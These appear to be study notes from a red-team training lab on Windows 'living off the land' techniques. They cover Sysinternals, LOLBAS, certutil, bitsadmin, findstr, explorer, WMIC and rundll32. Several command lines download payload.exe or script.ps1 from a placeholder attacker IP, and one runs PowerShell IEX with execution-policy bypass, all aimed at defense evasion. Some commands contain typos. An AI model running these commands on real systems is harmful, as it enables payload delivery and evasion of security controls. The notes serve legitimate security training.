Living off the land - use what is given - built-in tools and utilities
-recon
-file ops
-arbitrary code exe
-lateral movement
-security product bypass

---------------------------------------------------------------------------------------------------------------------------------------------------------------

Windows Sysinternals
-set of tools and advanced sys utilities
-manage, troubleshoot, diagnose
-accept microsoft license agreement to use tools
use command: -accepteula

AccessChk: help admins check specified access for files, dir, reg keys, global obj, win serv
PsExec: executes programs on remote system
ADExplorer: AD tool to help view and manage AD database
ProcDump: monitor running processes for CPU spikes and dump memory for analysis
ProcMon: process monitoring
TCPView: lists all TCP and UDP connections
PsTools: list detailed info
Portmon: monitor serial and parallel port activity
Whois: info for a specified domain name or IP

-access Sysinternals: web, windows share, command prompt

C:\Users\thm> C:\Tools\SysinternalsSuite\PsExec64.exe

Red Team = useful because they are trusted by OS
-tools useful for evading detection

------------------------------------------------------------------------------------------------------------------------------------------------------------------

LOLBAS

Living off the Land Binaries And Scripts - community driven repository gathering a collection of binaries, scripts, libraries that could be used for red team purposes

https://lolbas-project.github.io/

----------------------------------------------------------------------------------------------------------------------------------------------------------------

File Operations

Certutil:
built-in utility for managing certification services
-used to dump and display Certification Authority (CA)
-can encode and transfer files unrelated to certification - Ingress Tool Transfer (T1105)
-using split technique download file from URL
certutil -URLcache -split -f http://Attacker_IP/payload.exe C:\Windows\Temp\payload.exe
-used for eecoding
C:\Users\thm> certutil -encode payload.exe Encoded-payload.txt

BITSAdmin:
sys admin utility that can be used to create, download, or upload BITS (background intelligent transfer service)
-low-bandwidth and asynchronous method to download and upload files from HTTP webservers and SMB servers
-abused to download and execute malicious payload (T1197)
C:\Users\thm>bitsadmin.exe /transfer /Download /priority Foreground http://Attacker_IP/payload.exe c:\Users\thm\Desktop\payload.exe

FindStr:
find text and string patterns in files
-can be used to download remote files from SMB shared folders
C:\Users\thm>findstr /V dummystring \\MachineName\ShareFolder\test.exe > c:\Windows\Temp\test.exe

bitsadmin.exe /transfer /Download /priority Foregraound http://[IP]/file
enc_thm_0YmFiOG_file.txt

certutil.exe -decode enc_thm_0YmFiOG_file.txt decoded.txt
type decoded.txt
THM{ea4e2b9f362320d098635d4bab8a568e}

------------------------------------------------------------------------------------------------------------------------------------------------------------

File Execution
-Signed Binary Proxy Execution / Indirect Command Execution -  attacker leverages other system tools to spawn malicious payloads. 

File Explorer:
-can execute other .exe files
-indirect command execution where explore.exe can be used to launch malicious scripts  from trusted parent process
-location C:\Windows\explorer.exe - 32bit
-location C:\Windows\SysWOW64\explorer.exe - 64bit
C:\Users\thm> explorer.exe /root,"C:\Windows\System32\calc.exe"

WMIC:
-Windows management instrumentation (WMIC) - windows command line utility that manages windows componenets
-can be used to execute binaries for evading defensive measures (T1218)
C:\Users\thm> wmic.exe process call create calc

Rundll32:
-Microsoft built-in tool that loads and runs Dynamic Link Library (DLL) files
-signed binary proxy execution using Rundll32 (T1218)
-location C:\Windows\System32\rundll32.exe - 32 bits
-location C:\Windows\System64\rundll32.exe - 64 bits
-execute calc
C:\Users\thm> rundll32.exe javascript:"\..\mshtml.ddl,RunHTMLApplication ";eval("w=newActiveXObject(\"WScript.Shell\");w.run(\"calc\";window.close()");
-run powershell script
C:\Users\thm> rundll32.exe javasript:"\..\mshtml, RUNHTMLApplication";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-ObjectNet.WebClient).DownloadString('http://[IP]/script.ps1');");

-------------------------------------------------------------------------------------------------------------------------------------------------------------------

Bypassing Application Whitelisting





